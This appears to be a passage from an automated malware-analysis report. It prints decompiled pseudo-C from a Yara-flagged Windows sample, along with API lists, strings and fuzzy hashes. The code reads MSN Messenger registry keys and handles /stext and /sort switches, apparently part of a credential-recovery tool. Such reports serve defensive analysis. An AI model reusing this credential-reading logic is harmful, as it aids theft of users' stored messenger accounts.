                                                                                						_t31 = E00406DEB(_t47, _t37);
                                                                                						_push(_t31);
                                                                                						_push("/sort");
                                                                                						L004115C4();
                                                                                						if(_t31 == 0) {
                                                                                							_t4 = _t47 + 1; // 0x1
                                                                                							_t44 = E00406DEB(_t4,  *((intOrPtr*)(_t45 + 0x37c)));
                                                                                							_t54 =  *_t44 - 0x7e;
                                                                                							_t34 =  *((intOrPtr*)(_t45 + 0x370));
                                                                                							if( *_t44 != 0x7e) {
                                                                                								_push(0);
                                                                                							} else {
                                                                                								_push(1);
                                                                                								_t44 = _t44 + 1;
                                                                                							}
                                                                                							_push(_t44);
                                                                                							E0040A119(_t34, _t54);
                                                                                						}
                                                                                						_t37 =  *((intOrPtr*)(_t45 + 0x37c));
                                                                                						_t47 = _t47 + 1;
                                                                                					} while (_t47 <  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x37c)) + 0x30)));
                                                                                				}
                                                                                				E00405E2C();
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)) + 0x28)) = 0;
                                                                                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x370)))) + 0x5c))();
                                                                                				if(E00406DFB( *((intOrPtr*)(_t45 + 0x37c)), "/nosort") == 0xffffffff) {
                                                                                					_t46 =  *((intOrPtr*)(_t45 + 0x370));
                                                                                					if( *0x41748c == 0) {
                                                                                						 *0x417490 =  *((intOrPtr*)(_t46 + 0x1ac));
                                                                                						 *0x41748c = 1;
                                                                                					}
                                                                                					_t26 =  *((intOrPtr*)( *_t46 + 0x60))(E0040A0F3);
                                                                                					qsort( *((intOrPtr*)( *_t46 + 0x64))(), 0,  *(_t46 + 0x28), _t26);
                                                                                				}
                                                                                				return SetCursor( *0x416b98);
                                                                                			}












                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 882979914-1578091866
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 25%
                                                                                			E0040EE59(char* __edi, void* __esi) {
                                                                                				void* _v8;
                                                                                				char _v40;
                                                                                				void _v299;
                                                                                				char _v300;
                                                                                				void* _t32;
                                                                                				char* _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t38 = __esi;
                                                                                				_t37 = __edi;
                                                                                				E0040EDAC();
                                                                                				if( *0x41751c == 0 ||  *((intOrPtr*)(E00406278() + 0x10)) == 1 && (__esi == 0x19 || __esi == 0x17 || __esi == 0x16)) {
                                                                                					_v300 = 0;
                                                                                					memset( &_v299, 0, 0x103);
                                                                                					if(_t38 == 0x19 || _t38 == 0x17 || _t38 == 0x16) {
                                                                                						_push( &_v8);
                                                                                						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                						_push(0x80000002);
                                                                                					} else {
                                                                                						_push( &_v8);
                                                                                						_push("Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders");
                                                                                						_push(0x80000001);
                                                                                					}
                                                                                					if(E0040EB3F() == 0) {
                                                                                						E0040EDDB(_t38);
                                                                                						E0040EB80(0x104,  &_v40, _v8,  &_v40,  &_v300);
                                                                                						RegCloseKey(_v8);
                                                                                					}
                                                                                					strcpy(_t37,  &_v300);
                                                                                					return 0 |  *_t37 != 0x00000000;
                                                                                				} else {
                                                                                					_t32 =  *0x41751c(0, _t37, _t38, 0); // executed
                                                                                					return _t32;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                  • Part of subcall function 0040EDAC: LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,73B74DE0,?,00000000), ref: 0040EDBA
                                                                                  • Part of subcall function 0040EDAC: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                • memset.MSVCRT ref: 0040EEAE
                                                                                • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 0040EF17
                                                                                • strcpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 0040EF25
                                                                                  • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040EEC9, 0040EED9
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressCloseLibraryLoadProcVersionmemsetstrcpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 181880968-2036018995
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040396C(void* __eflags, void* __fp0, intOrPtr _a4) {
                                                                                				char _v528;
                                                                                				intOrPtr _v540;
                                                                                				char _v796;
                                                                                				char _v1052;
                                                                                				void* _v1056;
                                                                                				void* _v1060;
                                                                                				int _v1064;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* _t21;
                                                                                				long _t23;
                                                                                				void** _t24;
                                                                                				long _t26;
                                                                                				int _t32;
                                                                                				void* _t52;
                                                                                
                                                                                				_t52 = __fp0;
                                                                                				_v540 = 0x412e80;
                                                                                				E004046D7( &_v528);
                                                                                				_t32 = 0;
                                                                                				_v1052 = 0;
                                                                                				_v796 = 0;
                                                                                				_v1064 = 0;
                                                                                				do {
                                                                                					if(_v1064 != _t32) {
                                                                                						__eflags = _v1064 - 1;
                                                                                						if(__eflags != 0) {
                                                                                							_t21 = E0040D5DB( &_v1052, __eflags); // executed
                                                                                						} else {
                                                                                							_t23 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MessengerService", _t32, 0x20019,  &_v1060); // executed
                                                                                							__eflags = _t23;
                                                                                							if(_t23 != 0) {
                                                                                								goto L5;
                                                                                							} else {
                                                                                								_t24 =  &_v1060;
                                                                                								goto L4;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t26 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\MSNMessenger", _t32, 0x20019,  &_v1056); // executed
                                                                                						if(_t26 != 0) {
                                                                                							L5:
                                                                                							_t21 = 0;
                                                                                						} else {
                                                                                							_t24 =  &_v1056;
                                                                                							L4:
                                                                                							_t21 = E0040D4A6( &_v1052, _t24);
                                                                                						}
                                                                                					}
                                                                                					_t32 = 0;
                                                                                					if(_t21 != 0) {
                                                                                						E004038CF(_t52, _a4,  &_v1052);
                                                                                					}
                                                                                					_v1064 = _v1064 + 1;
                                                                                				} while (_v1064 <= 2);
                                                                                				return E004047F1( &_v528);
                                                                                			}



















                                                                                APIs
                                                                                  • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 004039C5
                                                                                  • Part of subcall function 0040D5DB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                                  • Part of subcall function 0040D5DB: strlen.MSVCRT ref: 0040D6B7
                                                                                  • Part of subcall function 0040D5DB: strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                                  • Part of subcall function 0040D5DB: LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\MessengerService,00000000,00020019,?), ref: 004039F7
                                                                                Strings
                                                                                • Software\Microsoft\MessengerService, xrefs: 004039F1
                                                                                • Software\Microsoft\MSNMessenger, xrefs: 004039BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Openstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                                • String ID: Software\Microsoft\MSNMessenger$Software\Microsoft\MessengerService
                                                                                • API String ID: 1910562259-1741179510
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040ED0B(unsigned int _a4, CHAR* _a8, CHAR* _a12) {
                                                                                				struct HRSRC__* _t12;
                                                                                				void* _t16;
                                                                                				void* _t17;
                                                                                				signed int _t26;
                                                                                				signed int _t29;
                                                                                				signed int _t33;
                                                                                				struct HRSRC__* _t35;
                                                                                				signed int _t36;
                                                                                
                                                                                				_t12 = FindResourceA(_a4, _a12, _a8); // executed
                                                                                				_t35 = _t12;
                                                                                				if(_t35 != 0) {
                                                                                					_t33 = SizeofResource(_a4, _t35);
                                                                                					if(_t33 > 0) {
                                                                                						_t16 = LoadResource(_a4, _t35);
                                                                                						if(_t16 != 0) {
                                                                                							_t17 = LockResource(_t16);
                                                                                							if(_t17 != 0) {
                                                                                								_a4 = _t33;
                                                                                								_t29 = _t33 * _t33;
                                                                                								_t36 = 0;
                                                                                								_t7 =  &_a4;
                                                                                								 *_t7 = _a4 >> 2;
                                                                                								if( *_t7 != 0) {
                                                                                									do {
                                                                                										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                										_t36 = _t36 + 1;
                                                                                										_t29 = _t26;
                                                                                									} while (_t36 < _a4);
                                                                                								}
                                                                                								 *0x417110 =  *0x417110 + _t29 ^ _t33;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 1;
                                                                                			}












                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0040ED18
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040ED29
                                                                                • LoadResource.KERNEL32(?,00000000), ref: 0040ED39
                                                                                • LockResource.KERNEL32(00000000), ref: 0040ED44
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                • Instruction ID: 6bf1e5af94a697a74b0619517749427008784a8e56cd275cc50dd62f01ccc87b
                                                                                • Opcode Fuzzy Hash: 4124c9c16d571b3a6a6dda8a6002e2ff58418d98f6681f6753ff1314487d049b
                                                                                • Instruction Fuzzy Hash: 450104367002126BCB185F66CD4599B7FAAFF852903488536AD09DA360D770C921C688
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 95%
                                                                                			E0040EA72(void* __ecx, intOrPtr* __edi, void* __eflags, intOrPtr _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, CHAR* _a20) {
                                                                                				void _v8199;
                                                                                				char _v8200;
                                                                                				void* __ebx;
                                                                                				int _t23;
                                                                                				CHAR* _t31;
                                                                                
                                                                                				E004118A0(0x2004, __ecx);
                                                                                				_v8200 = 0;
                                                                                				if(_a4 == 0) {
                                                                                					memset( &_v8199, 0, 0x2000);
                                                                                					GetPrivateProfileStringA(_a8, _a12, 0x412466,  &_v8200, 0x2000, _a20); // executed
                                                                                					_t23 = E004067DC( &_v8200, __edi, _a16);
                                                                                				} else {
                                                                                					memset( &_v8199, 0, 0x2000);
                                                                                					_t31 =  &_v8200;
                                                                                					E00406763(_t31, _a16,  *__edi);
                                                                                					_t23 = WritePrivateProfileStringA(_a8, _a12, _t31, _a20);
                                                                                				}
                                                                                				return _t23;
                                                                                			}









                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040EA9A
                                                                                  • Part of subcall function 00406763: sprintf.MSVCRT ref: 0040679B
                                                                                  • Part of subcall function 00406763: memcpy.MSVCRT ref: 004067AE
                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040EABE
                                                                                • memset.MSVCRT ref: 0040EAD5
                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,Function_00012466,?,00002000,?), ref: 0040EAF3
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                • String ID:
                                                                                • API String ID: 3143880245-0
                                                                                • Opcode ID: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                • Instruction ID: dd976746f5256500085d4a95e5c89bc7782f2e7a6919953fe2ebae93c0a04965
                                                                                • Opcode Fuzzy Hash: 55a900beb3324ae435e234628281be75478a67a5b39370e1d0f1c50bd7ccf1f7
                                                                                • Instruction Fuzzy Hash: 6F01A172800219BFEF12AF51DC89DDB3B79EF04344F0044A6B609A2062D6359A64CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E0040B785(intOrPtr __eax, intOrPtr* __ebx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t15;
                                                                                				void* _t16;
                                                                                				void* _t17;
                                                                                				struct HICON__* _t19;
                                                                                				intOrPtr* _t23;
                                                                                				void* _t25;
                                                                                
                                                                                				_t23 = __ebx;
                                                                                				_t14 = __eax;
                                                                                				 *((intOrPtr*)(__ebx + 0x124)) = 0;
                                                                                				 *__ebx = 0x41356c;
                                                                                				 *((intOrPtr*)(__ebx + 0x258)) = 0;
                                                                                				_push(0x14);
                                                                                				 *((intOrPtr*)(__ebx + 0x374)) = 0;
                                                                                				L004115D0();
                                                                                				if(__eax == 0) {
                                                                                					_t14 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					 *0x417114 = __eax;
                                                                                				}
                                                                                				 *((intOrPtr*)(_t23 + 0x36c)) = _t14;
                                                                                				L004115D0(); // executed
                                                                                				_t32 = _t14;
                                                                                				_t25 = 0xf38;
                                                                                				if(_t14 == 0) {
                                                                                					_t15 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t15 = E00404016(_t14, _t32);
                                                                                				}
                                                                                				 *((intOrPtr*)(_t23 + 0x370)) = _t15;
                                                                                				 *((intOrPtr*)(_t23 + 0x378)) = 0;
                                                                                				 *((intOrPtr*)(_t23 + 0x260)) = 0;
                                                                                				 *((intOrPtr*)(_t23 + 0x25c)) = 0;
                                                                                				 *((intOrPtr*)(_t23 + 0x154)) = 0;
                                                                                				_t16 =  *(_t23 + 0x258);
                                                                                				if(_t16 != 0) {
                                                                                					DeleteObject(_t16);
                                                                                					 *(_t23 + 0x258) = 0;
                                                                                				}
                                                                                				_t17 = E00406252(); // executed
                                                                                				 *(_t23 + 0x258) = _t17;
                                                                                				E00401000(_t25, _t23 + 0x158, 0x413480);
                                                                                				_t19 = LoadIconA( *0x416b94, 0x65); // executed
                                                                                				E004017A4(_t23, _t19);
                                                                                				return _t23;
                                                                                			}













                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$DeleteIconLoadObject
                                                                                • String ID:
                                                                                • API String ID: 1986663749-0
                                                                                • Opcode ID: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                • Instruction ID: 38da8263615bef274e7c21802c355ecfe582676222a25676d72b73c1d19d8401
                                                                                • Opcode Fuzzy Hash: 0423a71d4927b18fd553b5e50ae37bff09cbbc21581d25ca9f1141fabe86d1e7
                                                                                • Instruction Fuzzy Hash: 8C1151B09056509BCF519F259C887C53BA4EB84B41F1804BBFD08EF3A6DBB845418BAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E00411932() {
                                                                                				intOrPtr _t1;
                                                                                				intOrPtr _t2;
                                                                                				intOrPtr _t3;
                                                                                				intOrPtr _t4;
                                                                                
                                                                                				_t1 =  *0x417528;
                                                                                				if(_t1 != 0) {
                                                                                					_push(_t1);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t2 =  *0x417530;
                                                                                				if(_t2 != 0) {
                                                                                					_push(_t2); // executed
                                                                                					L004115D6(); // executed
                                                                                				}
                                                                                				_t3 =  *0x41752c;
                                                                                				if(_t3 != 0) {
                                                                                					_push(_t3);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t4 =  *0x417534;
                                                                                				if(_t4 != 0) {
                                                                                					_push(_t4); // executed
                                                                                					L004115D6(); // executed
                                                                                					return _t4;
                                                                                				}
                                                                                				return _t4;
                                                                                			}








                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                • Instruction ID: d6dbe33ea61767d3fff50222484a645f5af73bc96bc71b3580d13e53834dfd00
                                                                                • Opcode Fuzzy Hash: 91c60f5c1f6e7dd8e91e3fe6036ebb2df298eb5d5c74a2e7dfa5f35f51adb5a0
                                                                                • Instruction Fuzzy Hash: E0E012B0319201A68E20AB7BBD40A9323AE2A44310354806FF206D2AB1DE38D8C0C63C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E0040787D() {
                                                                                				void* _t13;
                                                                                				signed int _t16;
                                                                                				signed int _t18;
                                                                                				signed int _t27;
                                                                                				signed int _t29;
                                                                                				intOrPtr _t33;
                                                                                
                                                                                				_t33 =  *0x417540;
                                                                                				if(_t33 == 0) {
                                                                                					_push(0x8000);
                                                                                					 *0x417540 = 0x8000;
                                                                                					 *0x417544 = 0x100;
                                                                                					 *0x417548 = 0x1000; // executed
                                                                                					L004115D0(); // executed
                                                                                					 *0x417528 = 0x8000;
                                                                                					_t27 = 4;
                                                                                					_t16 =  *0x417544 * _t27;
                                                                                					_push( ~(0 | _t33 > 0x00000000) | _t16);
                                                                                					L004115D0();
                                                                                					 *0x417530 = _t16;
                                                                                					_t29 = 4;
                                                                                					_t18 =  *0x417544 * _t29;
                                                                                					_push( ~(0 | _t33 > 0x00000000) | _t18);
                                                                                					L004115D0();
                                                                                					_push( *0x417548);
                                                                                					 *0x417534 = _t18; // executed
                                                                                					L004115D0(); // executed
                                                                                					 *0x41752c = _t18;
                                                                                					return _t18;
                                                                                				}
                                                                                				return _t13;
                                                                                			}










                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                • Opcode ID: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                • Instruction ID: 98653883aa4781a1616f5f21c4e99a92f1a36013e955d8e4b32a99e29624f39b
                                                                                • Opcode Fuzzy Hash: d8185543564e7c8b2bd4b8c3e8d173cfd25ed724cb8acf65200bb5964d18c7b3
                                                                                • Instruction Fuzzy Hash: E6F012B1589210BFDB549B39ED067A53AB2A748394F10917EE207CA6F5FB7454408B4C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004060FA(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                                                                				void* _t8;
                                                                                				void* _t13;
                                                                                				signed int _t16;
                                                                                				void** _t21;
                                                                                				signed int _t22;
                                                                                
                                                                                				_t21 = __edi;
                                                                                				_t22 =  *__eax;
                                                                                				if(__edx < _t22) {
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t13 =  *__edi;
                                                                                					do {
                                                                                						 *__eax =  *__eax + _a8;
                                                                                						_t16 =  *__eax;
                                                                                					} while (__edx >= _t16);
                                                                                					_t8 = malloc(_t16 * _a4); // executed
                                                                                					 *__edi = _t8;
                                                                                					if(_t22 > 0) {
                                                                                						if(_t8 != 0) {
                                                                                							memcpy(_t8, _t13, _t22 * _a4);
                                                                                						}
                                                                                						free(_t13);
                                                                                					}
                                                                                					return 0 |  *_t21 != 0x00000000;
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                • malloc.MSVCRT ref: 00406116
                                                                                • memcpy.MSVCRT ref: 0040612E
                                                                                • free.MSVCRT(00000000,00000000,73B74DE0,00406B49,00000001,?,00000000,73B74DE0,00406D88,00000000,?,?), ref: 00406137
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: freemallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3056473165-0
                                                                                • Opcode ID: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                • Instruction ID: d153bd7f556b54fa1e8e463c7175d954409fdcf13f6af5892cc53e784d19f72a
                                                                                • Opcode Fuzzy Hash: c16869745dd056c7ef743fb7ed117d9ff76353dfe782dc17f391ee5363500ee0
                                                                                • Instruction Fuzzy Hash: 9DF0E9726052219FC7089F79B98145BB3DDAF84324B11482FF546D7292D7389C50C798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E0040B8D7(void* __edi, void* __eflags) {
                                                                                				void* __esi;
                                                                                				signed int _t24;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t38;
                                                                                				void* _t42;
                                                                                				void* _t45;
                                                                                				void* _t49;
                                                                                				void* _t51;
                                                                                				intOrPtr _t52;
                                                                                
                                                                                				_t54 = __eflags;
                                                                                				_t49 = __edi;
                                                                                				_t38 = 0;
                                                                                				E004023D4( *((intOrPtr*)(__edi + 0x370)), __eflags, 0, 0);
                                                                                				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                                                                				E00401E8B(_t54,  *((intOrPtr*)(__edi + 0x370)) + 0xb20); // executed
                                                                                				_t24 =  *((intOrPtr*)(__edi + 0x37c));
                                                                                				if( *((intOrPtr*)(_t24 + 0x30)) <= 0) {
                                                                                					_t51 = 0x412466;
                                                                                				} else {
                                                                                					if( *((intOrPtr*)(_t24 + 0x1c)) <= 0) {
                                                                                						_t45 = 0;
                                                                                						__eflags = 0;
                                                                                					} else {
                                                                                						_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t24 + 0xc)))) +  *((intOrPtr*)(_t24 + 0x10));
                                                                                					}
                                                                                					_t51 = _t45;
                                                                                				}
                                                                                				_push(_t51);
                                                                                				_push("/stext");
                                                                                				L004115B2();
                                                                                				if(_t24 != 0) {
                                                                                					_t52 = E0040B841(_t24, _t51);
                                                                                					__eflags = _t52 - _t38;
                                                                                					if(_t52 <= _t38) {
                                                                                						goto L15;
                                                                                					}
                                                                                					goto L9;
                                                                                				} else {
                                                                                					_t52 = 1;
                                                                                					L9:
                                                                                					E0040AF17(_t49, _t38); // executed
                                                                                					E0040A5AC(_t49);
                                                                                					_t31 =  *((intOrPtr*)(_t49 + 0x37c));
                                                                                					if( *((intOrPtr*)(_t31 + 0x30)) <= 1) {
                                                                                						_t42 = 0x412466;
                                                                                					} else {
                                                                                						_t59 =  *((intOrPtr*)(_t31 + 0x1c)) - 1;
                                                                                						if( *((intOrPtr*)(_t31 + 0x1c)) <= 1) {
                                                                                							_t42 = 0;
                                                                                						} else {
                                                                                							_t42 =  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)) + 4)) +  *((intOrPtr*)(_t31 + 0x10));
                                                                                						}
                                                                                					}
                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x370)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x36c)) + 0xc));
                                                                                					E00409B32( *((intOrPtr*)(_t49 + 0x370)),  *((intOrPtr*)(_t49 + 0x370)), _t49, _t59, _t42, _t52); // executed
                                                                                					_t38 = 1;
                                                                                					E0040B0C2(_t49);
                                                                                					L15:
                                                                                					return _t38;
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                  • Part of subcall function 00401E8B: memset.MSVCRT ref: 00401EAD
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401EC6
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401ED4
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F1A
                                                                                  • Part of subcall function 00401E8B: strlen.MSVCRT ref: 00401F28
                                                                                • _stricmp.MSVCRT(/stext,00412466,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B92B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strlen$_stricmpmemset
                                                                                • String ID: /stext
                                                                                • API String ID: 3575250601-3817206916
                                                                                • Opcode ID: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                • Instruction ID: 7d69c3f5364ef88ad9e24340ba35af89a1d621815374fdce2acadc9eabf4c73c
                                                                                • Opcode Fuzzy Hash: ba91a629983a4474272755d1190fe0abc20447847f5b5280d74d03c064ef9f45
                                                                                • Instruction Fuzzy Hash: 45213EB1614111DFC35C9B29C881D65B3A8FB45314B1582BFF91AA7292C738ED518BCD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406252() {
                                                                                				struct tagLOGFONTA _v64;
                                                                                				struct HFONT__* _t6;
                                                                                
                                                                                				E00406191( &_v64, "Arial", 0xe, 0);
                                                                                				_t6 = CreateFontIndirectA( &_v64); // executed
                                                                                				return _t6;
                                                                                			}





                                                                                0x00406264
                                                                                0x00406270
                                                                                0x00406277

                                                                                APIs
                                                                                  • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                  • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00406270
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFontIndirectmemsetstrcpy
                                                                                • String ID: Arial
                                                                                • API String ID: 3275230829-493054409
                                                                                • Opcode ID: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                • Instruction ID: 9d865b7f43533acfebf3b00b6ce8d331e43bccbbf35dbaed0a6f3a0435680c9f
                                                                                • Opcode Fuzzy Hash: 7d2b7ca13242ecb95fba35a4d161325a02a1357963518cd5c2775a7b681f11d7
                                                                                • Instruction Fuzzy Hash: B3D0C970E4020D76E600BAA0FD07B897BAC5B00605F508421BA41F51E2FAE8A15586A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004047A0(CHAR* __esi, void* __eflags) {
                                                                                				struct HINSTANCE__* _t8;
                                                                                				char _t12;
                                                                                				char* _t15;
                                                                                				CHAR* _t17;
                                                                                
                                                                                				_t17 = __esi;
                                                                                				E004047F1(__esi);
                                                                                				_t8 = LoadLibraryA(__esi); // executed
                                                                                				__esi[0x200] = _t8;
                                                                                				if(_t8 != 0) {
                                                                                					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
                                                                                					__esi[0x208] = _t12;
                                                                                					if(_t12 != 0) {
                                                                                						__esi[0x204] = 1;
                                                                                					}
                                                                                				}
                                                                                				_t15 =  &(_t17[0x204]);
                                                                                				if( *_t15 == 0) {
                                                                                					E004047F1(_t17);
                                                                                				}
                                                                                				return  *_t15;
                                                                                			}








                                                                                APIs
                                                                                  • Part of subcall function 004047F1: FreeLibrary.KERNELBASE(?,?), ref: 00404806
                                                                                • LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
